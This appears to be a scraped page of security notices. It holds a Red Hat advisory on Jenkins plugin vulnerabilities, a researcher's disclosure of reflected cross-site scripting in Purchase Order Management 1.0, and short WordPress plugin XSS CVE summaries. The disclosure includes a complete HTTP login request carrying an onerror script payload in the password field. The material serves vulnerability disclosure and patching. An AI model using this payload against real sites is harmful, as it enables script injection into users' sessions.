Red Hat Security Advisory 2023-1064-01 - Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron. Issues addressed include bypass, cross site request forgery, cross site scripting, and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Critical: OpenShift Developer Tools and Services for OCP 4.12 security update  
Advisory ID:       RHSA-2023:1064-01  
Product:           OpenShift Developer Tools and Services  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1064  
Issue date:        2023-03-06  
CVE Names:         CVE-2022-29047 CVE-2022-30952 CVE-2022-42003  
                   CVE-2022-42004 CVE-2022-43401 CVE-2022-43402  
                   CVE-2022-43403 CVE-2022-43404 CVE-2022-43405  
                   CVE-2022-43406 CVE-2022-43407 CVE-2022-43408  
                   CVE-2022-43409 CVE-2022-43410 CVE-2022-45047  
====================================================================  
1. Summary:

An update for Jenkins and Jenkins-2-plugins is now available for OpenShift  
Developer Tools and Services for OCP 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

OpenShift Developer Tools and Services for OCP 4.12 for RHEL 8 - noarch

3. Description:

Jenkins is a continuous integration server that monitors executions of  
repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43401)

* jenkins-plugin/workflow-cps: Sandbox bypass vulnerabilities in Pipeline:  
Groovy Plugin (CVE-2022-43402)

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43403)

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43404)

* jenkins-plugin/pipeline-groovy-lib: Sandbox bypass vulnerability in  
Pipeline: Groovy Libraries Plugin (CVE-2022-43405)

* jenkins-plugin/workflow-cps-global-lib: Sandbox bypass vulnerability in  
Pipeline: Deprecated Groovy Libraries Plugin (CVE-2022-43406)

* Pipeline Shared Groovy Libraries: Untrusted users can modify some  
Pipeline libraries in Pipeline Shared Groovy Libraries Plugin  
(CVE-2022-29047)

* jenkins-plugin/pipeline-input-step: CSRF protection for any URL can be  
bypassed in Pipeline: Input Step Plugin (CVE-2022-43407)

* mina-sshd: Java unsafe deserialization vulnerability (CVE-2022-45047)

* Jenkins plugin: User-scoped credentials exposed to other users by  
Pipeline SCM API for Blue Ocean Plugin (CVE-2022-30952)

* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)

* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

* jenkins-plugin/pipeline-stage-view: CSRF protection for any URL can be  
bypassed in Pipeline: Stage View Plugin (CVE-2022-43408)

* jenkins-plugin/workflow-support: Stored XSS vulnerability in Pipeline:  
Supporting APIs Plugin (CVE-2022-43409)

* jenkins-plugin/mercurial: Webhook endpoint discloses job names to  
unauthorized users in Mercurial Plugin (CVE-2022-43410)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For important instructions on how to upgrade your cluster and fully apply  
this asynchronous errata update in OpenShift Container Platform 4.12, see  
the following documentation, which will be updated shortly for this  
release:

https://docs.openshift.com/container-platform/4.12/cicd/jenkins/important-changes-to-openshift-jenkins-images.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2074855 - CVE-2022-29047 Pipeline Shared Groovy Libraries: Untrusted users can modify some Pipeline libraries in Pipeline Shared Groovy Libraries Plugin  
2119645 - CVE-2022-30952 Jenkins plugin: User-scoped credentials exposed to other users by Pipeline SCM API for Blue Ocean Plugin  
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2136369 - CVE-2022-43410 jenkins-plugin/mercurial: Webhook endpoint discloses job names to unauthorized users in Mercurial Plugin  
2136370 - CVE-2022-43406 jenkins-plugin/workflow-cps-global-lib: Sandbox bypass vulnerability in Pipeline: Deprecated Groovy Libraries Plugin  
2136374 - CVE-2022-43405 jenkins-plugin/pipeline-groovy-lib: Sandbox bypass vulnerability in Pipeline: Groovy Libraries Plugin  
2136379 - CVE-2022-43402 jenkins-plugin/workflow-cps: Sandbox bypass vulnerabilities in Pipeline: Groovy Plugin  
2136381 - CVE-2022-43401 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136382 - CVE-2022-43403 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136383 - CVE-2022-43404 jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins Script Security Plugin  
2136386 - CVE-2022-43407 jenkins-plugin/pipeline-input-step: CSRF protection for any URL can be bypassed in Pipeline: Input Step Plugin  
2136388 - CVE-2022-43408 jenkins-plugin/pipeline-stage-view: CSRF protection for any URL can be bypassed in Pipeline: Stage View Plugin  
2136391 - CVE-2022-43409 jenkins-plugin/workflow-support: Stored XSS vulnerability in Pipeline: Supporting APIs Plugin  
2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability

6. Package List:

OpenShift Developer Tools and Services for OCP 4.12 for RHEL 8:

Source:  
jenkins-2-plugins-4.12.1675702407-1.el8.src.rpm  
jenkins-2.361.4.1675702346-3.el8.src.rpm

noarch:  
jenkins-2-plugins-4.12.1675702407-1.el8.noarch.rpm  
jenkins-2.361.4.1675702346-3.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-29047  
https://access.redhat.com/security/cve/CVE-2022-30952  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/cve/CVE-2022-43401  
https://access.redhat.com/security/cve/CVE-2022-43402  
https://access.redhat.com/security/cve/CVE-2022-43403  
https://access.redhat.com/security/cve/CVE-2022-43404  
https://access.redhat.com/security/cve/CVE-2022-43405  
https://access.redhat.com/security/cve/CVE-2022-43406  
https://access.redhat.com/security/cve/CVE-2022-43407  
https://access.redhat.com/security/cve/CVE-2022-43408  
https://access.redhat.com/security/cve/CVE-2022-43409  
https://access.redhat.com/security/cve/CVE-2022-43410  
https://access.redhat.com/security/cve/CVE-2022-45047  
https://access.redhat.com/security/updates/classification/#critical

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAXcidzjgjWX9erEAQgupA//eFQlrAPyQGSP9g7NyP8IZknOMsnZ2NCn  
IQq00CAHWMdFgAGUHMNJZhOJ0eyS3iL4kSVgNSF0hIZgqh0tTT4ruJ7cujT4JApq  
ynrC7zUheiidSlQ70t0TAESlhIbUffw/VmdRmhXK8VU8P36718keuRO4t83PO/Rx  
eojx/uwQ7BIGBdhfU7RnQRbRu1AtiXSYTy40XUqk6sxdQ851ijs7iPd0HMGlbWgJ  
GyOCmKg7YyzUd52SG+YPFCxrhxwM+HNhX16+1xRIMzqPZiTzpaUBa9+27gUr8FyS  
GNbQ1kNd4TKE/EwNhUMjC/ILZLwsS57X1xeJwBKgjbScW1u1aM7hGaAc17i3HRZ2  
KtbhjEE5bueCP7eck20HKjB746u4v6dysD+dzyDAnFLfVBA7VWH851TvhwR+UkjH  
PqWsWEx7b8SNwedTkb+oMoJbBB+XbjEUcxc9BxaZF7ntkUgACGiCruiCHYAYFxTV  
oa0cTQnjlgDIQLfxqvv9NNKEZ4SqG66kHM6AdxhYGa33FH8mN2pOgmOvLV4TzB+O  
M1HlgiO1OpXuyQ5u0Jc5j5A5onGlS7QPzQD7S4bDRxLlCnvkstiLMmgs0JT4ncGx  
lcy9D7Fv92rc2bFQB5fYELikR+JSjICgkwnOJsRq9c3W7Ii5OFKieSS1EUwli2/o  
fWzJftH69Ds=RJgw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1064-01

Purchase Order Management version 1.0 appears to suffer from a cross site scripting vulnerability due to printing errors with a malicious password payload.

    ## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering## Author: nu11secur1ty## Date: 03.06.2023## Vendor: https://www.sourcecodester.com/user/257130/activity## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `password` request parameter is copied into the HTMLdocument as plain text between tags. The payload uay4w<img src=aonerror=alert(1)>s4m6g was submitted in the password parameter. Thisinput was echoed unmodified in the application's response.STATUS: HIGH Vulnerability[+]Exploit:```POSTPOST /purchase_order/classes/Login.php?f=login HTTP/1.1Host: localhostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5Origin: http://localhostX-Requested-With: XMLHttpRequestReferer: http://localhost/purchase_order/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)## Proof and Exploit:[href](https://streamable.com/cgw8a4)## Time spend:00:15:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Purchase Order Management 1.0 Cross Site Scripting

The WordPress Shortcodes WordPress plugin through 1.6.36 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0063

The eVision Responsive Column Layout Shortcodes WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0064

The i2 Pros & Cons WordPress plugin through 1.3.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0065

The Product GTIN (EAN, UPC, ISBN) for WooCommerce WordPress plugin through 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0068

The WPaudio MP3 Player WordPress plugin through 4.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0069

The Download Attachments WordPress plugin through 1.2.24 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0076

The Resume Builder WordPress plugin through 3.1.1 does not sanitize and escape some parameters related to Resume, which could allow users with a role as low as subscriber to perform Stored XSS attacks against higher privilege users

CVE-2023-0078

The Cost Calculator WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Tag

#xss